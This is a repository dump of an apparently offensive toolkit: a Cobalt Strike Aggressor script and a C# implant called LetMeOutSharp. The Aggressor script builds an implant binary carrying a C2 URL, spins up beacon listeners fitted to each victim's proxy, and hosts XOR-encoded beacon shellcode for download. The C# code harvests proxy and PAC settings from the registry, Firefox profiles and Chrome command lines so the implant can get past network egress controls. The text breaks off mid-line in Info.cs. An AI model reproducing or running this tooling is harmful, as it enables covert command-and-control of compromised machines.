├── .gitignore
├── AggressiveProxy.cna
├── LetMeOutSharp.sln
├── LetMeOutSharp
    ├── .gitignore
    ├── LetMeOutSharp.sln
    └── LetMeOutSharp
    │   ├── Info.cs
    │   ├── Injector.cs
    │   ├── LetMeOutSharp.csproj
    │   ├── Program_template.cs
    │   ├── Properties
    │       └── AssemblyInfo.cs
    │   └── Utilities.cs
└── README.md

/.gitignore:
--------------------------------------------------------------------------------
# globs
Makefile.in
*.userprefs
*.usertasks
config.make
config.status
aclocal.m4
install-sh
autom4te.cache/
*.tar.gz
tarballs/
test-results/

# Mac bundle stuff
*.dmg
*.app

# content below from: https://github.com/github/gitignore/blob/master/Global/macOS.gitignore
# General
.DS_Store
.AppleDouble
.LSOverride

# Icon must end with two \r
Icon


# Thumbnails
._*

# Files that might appear in the root of a volume
.DocumentRevisions-V100
.fseventsd
.Spotlight-V100
.TemporaryItems
.Trashes
.VolumeIcon.icns
.com.apple.timemachine.donotpresent

# Directories potentially created on remote AFP share
.AppleDB
.AppleDesktop
Network Trash Folder
Temporary Items
.apdisk

# content below from: https://github.com/github/gitignore/blob/master/Global/Windows.gitignore
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

# Dump file
*.stackdump

# Folder config file
[Dd]esktop.ini

# Recycle Bin used on file shares
$RECYCLE.BIN/

# Windows Installer files
*.cab
*.msi
*.msix
*.msm
*.msp

# Windows shortcuts
*.lnk

# content below from: https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore

# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates

# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs

# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/

# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/

# Visual Studio 2017 auto generated files
Generated\ Files/

# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*

# NUNIT
*.VisualState.xml
TestResult.xml

# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c

# Benchmark Results
BenchmarkDotNet.Artifacts/

# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/

# StyleCop
StyleCopReport.xml

# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc

# Chutzpah Test files
_Chutzpah*

# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb

# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap

# Visual Studio Trace Files
*.e2e

# TFS 2012 Local Workspace
$tf/

# Guidance Automation Toolkit
*.gpState

# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# JustCode is a .NET coding add-in
.JustCode

# TeamCity is a build add-in
_TeamCity*

# DotCover is a Code Coverage Tool
*.dotCover

# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json

# Visual Studio code coverage results
*.coverage
*.coveragexml

# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*

# MightyMoose
*.mm.*
AutoTest.Net/

# Web workbench (sass)
.sass-cache/

# Installshield output folder
[Ee]xpress/

# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html

# Click-Once directory
publish/

# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj

# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/

# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets

# Microsoft Azure Build Output
csx/
*.build.csdef

# Microsoft Azure Emulator
ecf/
rcf/

# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx

# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/

# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs

# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk

# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/

# RIA/Silverlight projects
Generated_Code/

# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak

# SQL Server files
*.mdf
*.ldf
*.ndf

# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser

# Microsoft Fakes
FakesAssemblies/

# GhostDoc plugin setting file
*.GhostDoc.xml

# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/

# Visual Studio 6 build log
*.plg

# Visual Studio 6 workspace options file
*.opt

# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw

# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions

# Paket dependency manager
.paket/paket.exe
paket-files/

# FAKE - F# Make
.fake/

# JetBrains Rider
.idea/
*.sln.iml

# CodeRush personal settings
.cr/personal

# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc

# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config

# Tabs Studio
*.tss

# Telerik's JustMock configuration file
*.jmconfig

# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs

# OpenCover UI analysis results
OpenCover/

# Azure Stream Analytics local run output
ASALocalRun/

# MSBuild Binary and Structured Log
*.binlog

# NVidia Nsight GPU debugger configuration file
*.nvuser

# MFractors (Xamarin productivity tool) working folder
.mfractor/

# Local History for Visual Studio
.localhistory/

--------------------------------------------------------------------------------
/AggressiveProxy.cna:
--------------------------------------------------------------------------------
global('$selected_listener $proxy_handler_url');

$msbuild = "/Library/Frameworks/Mono.framework/Versions/Current/Commands/msbuild";

menubar("Proxy Handler", "proxy_handler");

popup proxy_handler {
    item "&Start Handler" {
        start_handler();
    }
    item "&Stop Handler" {
        stop_handler();
    }
    item "&Clean-up hosted content" {
        clean_site_contents();
    }
}

sub start_handler {
    local('$dialog');
    if($selected_listener) {
        show_message("[AggressiveProxy] ERROR: Already started...");
        exit();
    }
    $dialog = dialog("Proxy Handler Generation", %(listener => "", checkurl => "/proxy", responseContent => "ok"), &start_handler_Callback);
    drow_listener_stage($dialog, "listener", "Listener: ");
    drow_text($dialog, "checkurl", "Check URL: ");
    drow_text($dialog, "responseContent", "Expected Response Content: ");
    dbutton_action($dialog, "Start & Build binary");
    dialog_show($dialog);
}

sub build_letmeout {
    local('$url $responseContent $handle $data $destination $buildver $build');
    $url = $1;
    $responseContent = $2;

    println($url);
    $handle = openf(script_resource("LetMeOutSharp/LetMeOutSharp/Program_template.cs"));
    $data = readb($handle, -1);
    closef($handle);

    $data = strrep($data, "%C2URL%", $url);
    $data = strrep($data, "%RESPONSE%", $responseContent);

    $destination = openf(">".script_resource("LetMeOutSharp/LetMeOutSharp/Program.cs"));
    writeb($destination,$data);
    closef($destination);
    $buildver = "Release"; # "Release" or "Debug"

    println("[AggressiveProxy] INFO: Using msbuild: $msbuild");
    $build = exec($msbuild . " -m -t:Rebuild -p:Configuration=" . $buildver . " -p:NoWarn=0168 " . script_resource("LetMeOutSharp/LetMeOutSharp.sln"));
    wait($build);
    # println(readAll($build)); # remove
    closef($build);
    println("[AggressiveProxy] INFO: The binary file should be located at: " . script_resource("LetMeOutSharp/LetMeOutSharp/bin/" . $buildver . "/letmeout.exe"));
    show_message("The binary file should be located at: " . script_resource("LetMeOutSharp/LetMeOutSharp/bin/" . $buildver . "/letmeout.exe"));
}

sub start_handler_Callback {
    local('%info $ssl $checkurl $responseContent');
    if($selected_listener) {
        show_message("[AggressiveProxy] ERROR: Already started...");
        exit();
    }

    clean_site_contents();
    println("[AggressiveProxy] INFO: Start serving...");
    if ($3['listener'] eq "") {
        show_message("[AggressiveProxy] ERROR: No listener specified!");
        exit();
    }

    %info = listener_info($3['listener']);

    if(%info['payload'] ne "windows/beacon_http/reverse_http" && %info['payload'] ne "windows/beacon_https/reverse_https")
    {
        show_message("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
        elog("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
        println("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
        exit();
    }

    $selected_listener = copy(%info);
    println("[AggressiveProxy] INFO: Base listener is: $selected_listener['name']");

    $selected_listener['name'] = 'agproxy';
    $selected_listener['status'] = $null;
    $ssl = false;

    if($selected_listener['payload'] eq "windows/beacon_https/reverse_https") {
        println("[AggressiveProxy] INFO: Using HTTPS");
        $ssl = true;
    }

    $checkurl = $3['checkurl'];
    if(left($checkurl,1) ne "/") {
        println("[AggressiveProxy] WARNING: Url needs to start with /. Adding /.");
        $checkurl = "/" . $checkurl;
    }
    $responseContent = $3['responseContent'];

    $proxy_handler_url = $checkurl;
    $url = site_host($selected_listener['host'], $selected_listener['port'], $checkurl, $responseContent, "text/plain", "Proxy Shellcode Handler", $ssl);
    build_letmeout($url, $responseContent);
}

sub stop_handler {
    if($selected_listener) {
        println("[AggressiveProxy] INFO: Stopping...");
        clean_site_contents();
        $selected_listener = $null;
    }
}

sub clean_site_contents {
    # Cleanup site contents
    local('$type $key $value $description');
    println("[AggressiveProxy] INFO: Cleaning site contents...");
    foreach $key => $value (sites()){
        $type = $value['Type'];
        $description = $value['Description'];
        if($type eq "page" && $description eq "Proxy Shellcode Handler") {
            site_kill($value['Port'], $value['URI']);
        }
        if($type eq "page" && $description eq "Proxy enabled shellcode") {
            site_kill($value['Port'], $value['URI']);
        }
    }
}

println("[AggressiveProxy] INFO: Serving you...");

on web_hit {

    local('$temp_listener_options $b64proxy $b64useragent $is64 $proxy $useragent $data $hexdata $payload $listener_name $arch $proxyshellcodeurl $variant');

    if($selected_listener) {
        if ($2 eq $proxy_handler_url) {
            println("[AggressiveProxy] INFO: Proxy handler URL: $proxy_handler_url");
            println("[AggressiveProxy] INFO: Visit in the proxy handler URL from: $3");
            $b64proxy = $8['a'];
            $b64useragent = $8['b'];
            $is64 = $8['c'];
            $proxy = base64_decode($b64proxy);
            $useragent = base64_decode($b64useragent);
            $variant = "";
            if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36") {
                # Chrome
                $variant = "chrome";
            } else if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edge/86.0.622.51") {
                # Edge
                $variant = "edge";
            } else if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0") {
                # Firefox
                $variant = "firefox";
            } else {
                # default
                $variant = "default";
            }
            println("[AggressiveProxy] INFO: The proxy received is: $proxy");
            println("[AggressiveProxy] INFO: User-agent: $useragent");
            println("[AggressiveProxy] INFO: Variant to use: $variant");

            $temp_listener_options = copy($selected_listener);
            $temp_listener_options['name'] = $null;
            $temp_listener_options['payload'] = $null;

            if($proxy) {
                if(right($proxy,1) eq "/")
                {
                    $proxy = left($proxy,-1); #COBALT BUG with slash
                }
                $temp_listener_options['proxy'] = $proxy;
            } else {
                println("[AggressiveProxy] INFO: Using direct connectivity")
                $temp_listener_options['proxy'] = "*direct*";
            }

            $arch = "x64";
            if($is64 eq "0") {
                $arch = "x86";
            }

            $temp_listener_options['profile'] = $variant;
            $proxyshellcodeurl = $b64proxy . base64_encode($variant) . base64_encode($arch);
            $listener_name = "agproxy-rand" . rand(10000);

            println("[AggressiveProxy] INFO: Using payload for: $selected_listener['payload']");
            listener_create_ext($listener_name, $selected_listener['payload'], $temp_listener_options); # This will log a java.lang.RuntimeException: Another Beacon listener exists on your cobalt console
            println("[AggressiveProxy] INFO: Started temp listener: $listener_name");

            when("listeners", lambda({
                local('$data $xordata $hexdata $ssl');
                println("[AggressiveProxy] INFO: Generating & hosting new payload \($listener_name - $arch\)");
                $data = artifact_payload($listener_name, "raw", $arch);
                $xordata = str_xor($data, chr(42));
                $hexdata = transform($xordata, "hex");
                $ssl = false;
                if($selected_listener['payload'] eq "windows/beacon_https/reverse_https") {
                    println("[AggressiveProxy] INFO: Using HTTPS");
                    $ssl = true;
                }
                println("[AggressiveProxy] INFO: Shellcode length: " . strlen($hexdata));
                println("[AggressiveProxy] INFO: Hosting payload at: /$proxyshellcodeurl")
                site_host($selected_listener['host'], $selected_listener['port'], "/$proxyshellcodeurl", "$hexdata", "text/plain", "Proxy enabled shellcode", $ssl);
                listener_delete($listener_name);


            }, $proxyshellcodeurl => $proxyshellcodeurl, $listener_name => $listener_name, $arch => $arch));
        }
    } else {
        elog("[AggressiveProxy] WARNING: Not started yet");
        println("[AggressiveProxy] WARNING: Not started yet");
    }
}

--------------------------------------------------------------------------------
/LetMeOutSharp.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LetMeOutSharp", "LetMeOutSharp\LetMeOutSharp.csproj", "{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}"
EndProject
Global
    GlobalSection(SolutionConfigurationPlatforms) = preSolution
        Debug|anycpu = Debug|anycpu
        Release|anycpu = Release|anycpu
    EndGlobalSection
    GlobalSection(ProjectConfigurationPlatforms) = postSolution
        {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.ActiveCfg = Debug|anycpu
        {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.Build.0 = Debug|anycpu
        {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.ActiveCfg = Release|anycpu
        {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.Build.0 = Release|anycpu
    EndGlobalSection
EndGlobal

--------------------------------------------------------------------------------
/LetMeOutSharp/LetMeOutSharp/Info.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using Microsoft.Win32;

namespace LetMeOutSharp
{
    public static class UserAgents
    {
        //Default User-Agents
        public static readonly string NOUA = "";

        public static readonly string CHUA =
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36";

        public static readonly string EDUA =
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edge/86.0.622.51";

        public static readonly string WHUA = "WinHttp-Autoproxy-Service/5.1";

        public static readonly string FFUA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0";
    }

    public class ConfigPair
    {
        public Uri URL { get; set; }
        public string UserAgent { get; set; }
        public string URLString
        {
            get
            {
                if (URL == null)
                {
                    return "";
                }
                else
                {
                    return URL.ToString();
                }
            }
        }
        public override string ToString()
        {
            string url = "";
            if (URL != null)
            {
                url = URL.ToString();
            }
            return string.Format("\tProxy URL: {0} - UA: {1}", url, UserAgent);
        }
    }

    public static class Enumerator
    {
        //Get entries from the registry
        public static ConfigPair GetRegistry(string key, string value, string UA)
        {
            ConfigPair ret = null;
            try
            {
                var regkey = Registry.GetValue(key, value, null);
                if (regkey != null)
                {
                    ret = new ConfigPair { URL = regkey.ToString().ToUri(), UserAgent = UA };
                }
            }
            catch (Exception ex)
            {
#if DEBUG
                Console.WriteLine("[*] An exception occured: {0}", ex);
#endif
            }
            return ret;
        }


        //Retrieve the PAC URL for IE via the registry
        public static List<ConfigPair> GetIEPAC()
        {
#if DEBUG
            Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name);
#endif
            List<ConfigPair> ret = new List<ConfigPair>();

            //Read PAC URL from HKCU
            var pacurl_hkcu = GetRegistry("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "AutoConfigURL", UserAgents.WHUA);
            if (pacurl_hkcu != null && !ret.Any(x => x.URL.Equals(pacurl_hkcu.URL)))
            {
                ret.Add(pacurl_hkcu);
            }

            //Read PAC URL from HKLM
            var pacurl_hklm = GetRegistry("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "AutoConfigURL", UserAgents.WHUA);
            if (pacurl_hklm != null && !ret.Any(x => x.URL.Equals(pacurl_hklm.URL)))
            {
                ret.Add(pacurl_hklm);
            }

#if DEBUG
            Console.WriteLine("\t{0} PAC", ret.Count);
            foreach (var pac in ret)
            {
                Console.WriteLine("\tPAC: {0}", pac);
            }
#endif
            return ret;
        }

        //Retrieve the PAC URL for Chrome via the registry
        public static List<ConfigPair> GetChromePAC()
        {
#if DEBUG
            Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name);
#endif
            List<ConfigPair> ret = new List<ConfigPair>();

            //Read PAC URL from HKCU
            var pacurl_hkcu = GetRegistry("HKEY_CURRENT_USER\\Software\\Policies\\Google\\Chrome\\", "ProxyPacUrl", UserAgents.CHUA);
            if (pacurl_hkcu != null && !ret.Any(x => x.URL.Equals(pacurl_hkcu.URL)))
            {
                ret.Add(pacurl_hkcu);
            }

            //Read PAC URL from HKLM
            var pacurl_hklm = GetRegistry("HKEY_LOCAL_MACHINE\\Software\\Policies\\Google\\Chrome\\", "ProxyPacUrl", UserAgents.CHUA);
            if (pacurl_hklm != null && !ret.Any(x => x.URL.Equals(pacurl_hklm.URL)))
            {
                ret.Add(pacurl_hklm);
            }

#if DEBUG
            Console.WriteLine("\t{0} PAC", ret.Count);
            foreach (var pac in ret)
            {
                Console.WriteLine("\tPAC: {0}", pac);
            }
#endif
            return ret;
        }

        //Retrieve the PAC URL for Firefox via the prefs file
        public static List<ConfigPair> GetFirefoxPAC()
        {
#if DEBUG
            Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name);
#endif

            List<ConfigPair> ret = new List<ConfigPair>();
            try
            {
                string profiles = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) +
                                  "\\Mozilla\\Firefox\\Profiles\\";
                if (Directory.Exists(profiles))
                {
                    foreach (string dir in Directory.GetDirectories(profiles))
                    {
                        Uri pacURL = null;
                        string prefFile = string.Format("{0}\\{1}", dir, "prefs.js");
                        if (File.Exists(prefFile))
                        {
                            string[] readText = File.ReadAllLines(prefFile);
                            foreach (string line in readText)
                            {
                                if (line.Contains("network.proxy.autoconfig_url\""))
                                {
                                    pacURL = line.Split(',')[1].Trim().Split('"')[1].ToUri();
                                    ret.Add(new ConfigPair { URL = pacURL, UserAgent = UserAgents.FFUA });
                                }
                            }
                        }
                    }
                }
            }
            catch (Exception ex)
            {
#if DEBUG
                Console.WriteLine("[*] An exception occured: {0}", ex.Message);
#endif
            }

#if DEBUG
            Console.WriteLine("\t{0} PAC", ret.Count);
            foreach (var pac in ret)
            {
                Console.WriteLine("\tPAC: {0}", pac);
            }
#endif
            return ret;
        }

        //Retrieve Proxy URL for Chrome
        public static List<ConfigPair> GetChromeProxy()
        {
#if DEBUG
            Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name);
#endif
            List<ConfigPair> ret = new List<ConfigPair>();

            string profiles = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
                              "\\Google\\";
            if (Directory.Exists(profiles))
            {
                //Chrome is installed.
Will also try to get the system proxy and use the chrome UA 206 | try 207 | { 208 | Uri site_to_check = new Uri("https://www.google.com"); 209 | Uri proxy = System.Net.WebRequest.GetSystemWebProxy().GetProxy(site_to_check); 210 | if (proxy != null && proxy != site_to_check) 211 | { 212 | if (!ret.Any(x => x.URL.Equals(proxy))) 213 | { 214 | ret.Add(new ConfigPair { URL = proxy, UserAgent = UserAgents.CHUA }); 215 | } 216 | } 217 | } 218 | catch (Exception ex) 219 | { 220 | #if DEBUG 221 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 222 | #endif 223 | } 224 | } 225 | 226 | //Read proxy from HKCU 227 | var proxy_hkcu = GetRegistry("HKEY_CURRENT_USER\\Software\\Policies\\Google\\Chrome\\", "ProxyServer", UserAgents.CHUA); 228 | if (proxy_hkcu != null && !ret.Any(x => x.URL.Equals(proxy_hkcu.URL))) 229 | { 230 | ret.Add(proxy_hkcu); 231 | } 232 | 233 | //Read proxy from HKLM 234 | var proxy_hklm = GetRegistry("HKEY_LOCAL_MACHINE\\Software\\Policies\\Google\\Chrome\\", "ProxyServer", UserAgents.CHUA); 235 | if (proxy_hklm != null && !ret.Any(x => x.URL.Equals(proxy_hklm.URL))) 236 | { 237 | ret.Add(proxy_hklm); 238 | } 239 | 240 | //Get value from CommandLine 241 | try 242 | { 243 | foreach (var process in System.Diagnostics.Process.GetProcessesByName("chrome")) 244 | { 245 | string proxyServer = process.GetCommandLine(); 246 | if (!string.IsNullOrEmpty(proxyServer)) 247 | { 248 | Uri proxyUri = proxyServer.ToUri(); 249 | if (!ret.Any(x => x.URL.Equals(proxyUri))) 250 | { 251 | ret.Add(new ConfigPair { URL = proxyUri, UserAgent = UserAgents.CHUA }); 252 | } 253 | } 254 | } 255 | } 256 | catch (Exception ex) 257 | { 258 | #if DEBUG 259 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 260 | #endif 261 | } 262 | 263 | #if DEBUG 264 | Console.WriteLine("\t{0} proxies", ret.Count); 265 | foreach (var proxy in ret) 266 | { 267 | Console.WriteLine(proxy); 268 | } 269 | #endif 270 | return ret; 271 | } 272 | 273 | //Retrieve Proxy URL for IE 
from the registry 274 | public static List GetIEProxy() 275 | { 276 | #if DEBUG 277 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 278 | #endif 279 | List ret = new List(); 280 | 281 | //Get value from HKCU 282 | var proxy_hkcu = GetRegistry("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "ProxyServer", UserAgents.EDUA); 283 | if (proxy_hkcu != null) 284 | { 285 | ret.Add(proxy_hkcu); 286 | } 287 | 288 | //Get value from HKLM 289 | var proxy_hklm = GetRegistry("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "ProxyServer", UserAgents.EDUA); 290 | if (proxy_hklm != null && !ret.Any(x => x.URL.Equals(proxy_hklm.URL))) 291 | { 292 | ret.Add(proxy_hklm); 293 | } 294 | 295 | //Get proxy for google via GetSystemWebProxy 296 | try 297 | { 298 | Uri site_to_check = new Uri("https://www.google.com"); 299 | Uri proxy = System.Net.WebRequest.GetSystemWebProxy().GetProxy(site_to_check); 300 | if (proxy != null && proxy != site_to_check) 301 | { 302 | if (!ret.Any(x => x.URL.Equals(proxy))) 303 | { 304 | ret.Add(new ConfigPair { URL = proxy, UserAgent = UserAgents.EDUA }); 305 | } 306 | } 307 | } 308 | catch (Exception ex) 309 | { 310 | #if DEBUG 311 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 312 | #endif 313 | } 314 | 315 | #if DEBUG 316 | Console.WriteLine("\t{0} proxies", ret.Count); 317 | foreach (var proxy in ret) 318 | { 319 | Console.WriteLine(proxy); 320 | } 321 | #endif 322 | return ret; 323 | } 324 | 325 | //Retrieve the Proxy URL for Firefox via the prefs file 326 | public static List GetFirefoxProxy() 327 | { 328 | #if DEBUG 329 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 330 | #endif 331 | List ret = new List(); 332 | try 333 | { 334 | string profiles = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + 335 | "\\Mozilla\\Firefox\\Profiles\\"; 336 | if (Directory.Exists(profiles)) 337 | 
{ 338 | //Firefox is installed. Will also try to get the system proxy and use the firefox UA 339 | try 340 | { 341 | Uri site_to_check = new Uri("https://www.google.com"); 342 | Uri proxy = System.Net.WebRequest.GetSystemWebProxy().GetProxy(site_to_check); 343 | if (proxy != null && proxy != site_to_check) 344 | { 345 | if (!ret.Any(x => x.URL.Equals(proxy))) 346 | { 347 | ret.Add(new ConfigPair { URL = proxy, UserAgent = UserAgents.FFUA }); 348 | } 349 | } 350 | } 351 | catch (Exception ex) 352 | { 353 | #if DEBUG 354 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 355 | #endif 356 | } 357 | 358 | //Have a look at the profiles 359 | foreach (string dir in Directory.GetDirectories(profiles)) 360 | { 361 | string proxyAddress = ""; 362 | string proxyPort = ""; 363 | string proxySslAddress = ""; 364 | string proxySslPort = ""; 365 | string prefFile = string.Format("{0}\\{1}", dir, "prefs.js"); 366 | #if DEBUG 367 | Console.WriteLine("\tPrefs file: {0}", prefFile); 368 | #endif 369 | if (File.Exists(prefFile)) 370 | { 371 | string[] readText = File.ReadAllLines(prefFile); 372 | foreach (string line in readText) 373 | { 374 | if (line.Contains("network.proxy.http\"")) 375 | { 376 | proxyAddress = line.Split(',')[1].Trim().Split('"')[1]; 377 | } 378 | 379 | if (line.Contains("network.proxy.http_port\"")) 380 | { 381 | proxyPort = line.Split(',')[1].Trim().Replace(");", ""); 382 | } 383 | 384 | if (line.Contains("network.proxy.ssl\"")) 385 | { 386 | proxySslAddress = line.Split(',')[1].Trim().Split('"')[1]; 387 | } 388 | 389 | if (line.Contains("network.proxy.ssl_port\"")) 390 | { 391 | proxySslPort = line.Split(',')[1].Trim().Replace(");", ""); 392 | } 393 | } 394 | 395 | if (!(string.IsNullOrEmpty(proxyAddress) || string.IsNullOrEmpty(proxyPort))) 396 | { 397 | Uri p = string.Format("{0}:{1}", proxyAddress, proxyPort).ToUri(); 398 | if (!ret.Any(x => x.URL.Equals(p))) 399 | { 400 | ret.Add(new ConfigPair { URL = p, UserAgent = UserAgents.FFUA }); 401 
| } 402 | } 403 | 404 | if (!(string.IsNullOrEmpty(proxySslAddress) || string.IsNullOrEmpty(proxySslPort))) 405 | { 406 | Uri p = string.Format("{0}:{1}", proxySslAddress, proxySslPort).ToUri(); 407 | if (!ret.Any(x => x.URL.Equals(p))) 408 | { 409 | ret.Add(new ConfigPair { URL = p, UserAgent = UserAgents.FFUA }); 410 | } 411 | } 412 | } 413 | } 414 | } 415 | } 416 | catch (Exception ex) 417 | { 418 | #if DEBUG 419 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 420 | #endif 421 | } 422 | 423 | #if DEBUG 424 | Console.WriteLine("\t{0} proxies", ret.Count); 425 | foreach (var proxy in ret) 426 | { 427 | Console.WriteLine(proxy); 428 | } 429 | #endif 430 | return ret; 431 | } 432 | 433 | // Retrieve IE, Chrome, Firefox PAC URLs 434 | public static List GetPACURLS() 435 | { 436 | #if DEBUG 437 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 438 | #endif 439 | //Get all PAC URL's in a list 440 | 441 | List PACURL = new List(); 442 | var ie = GetIEPAC(); 443 | PACURL.AddRange(ie); 444 | var ch = GetChromePAC(); 445 | PACURL.AddRange(ch); 446 | var fx = GetFirefoxPAC(); 447 | PACURL.AddRange(fx); 448 | 449 | #if DEBUG 450 | Console.WriteLine("GetPACURLS: {0} PAC", PACURL.Count); 451 | #endif 452 | return PACURL; 453 | } 454 | 455 | //Retrieve all proxies from the PAC URLs 456 | public static List GetProxiesFromPAC() 457 | { 458 | List ret = new List(); 459 | foreach (ConfigPair conf in GetPACURLS()) 460 | { 461 | List proxyconfig = GetPAC(conf); 462 | foreach (ConfigPair proxy in proxyconfig) 463 | { 464 | if (!ret.Any(x => x.URL.Equals(proxy.URL) && x.UserAgent.Equals(proxy.UserAgent))) 465 | { 466 | ret.Add(proxy); 467 | } 468 | } 469 | } 470 | return ret; 471 | } 472 | 473 | //Process PAC URL and extract proxies 474 | public static List GetPAC(ConfigPair config) 475 | { 476 | #if DEBUG 477 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 478 | Console.WriteLine("Processing PAC: {0}", 
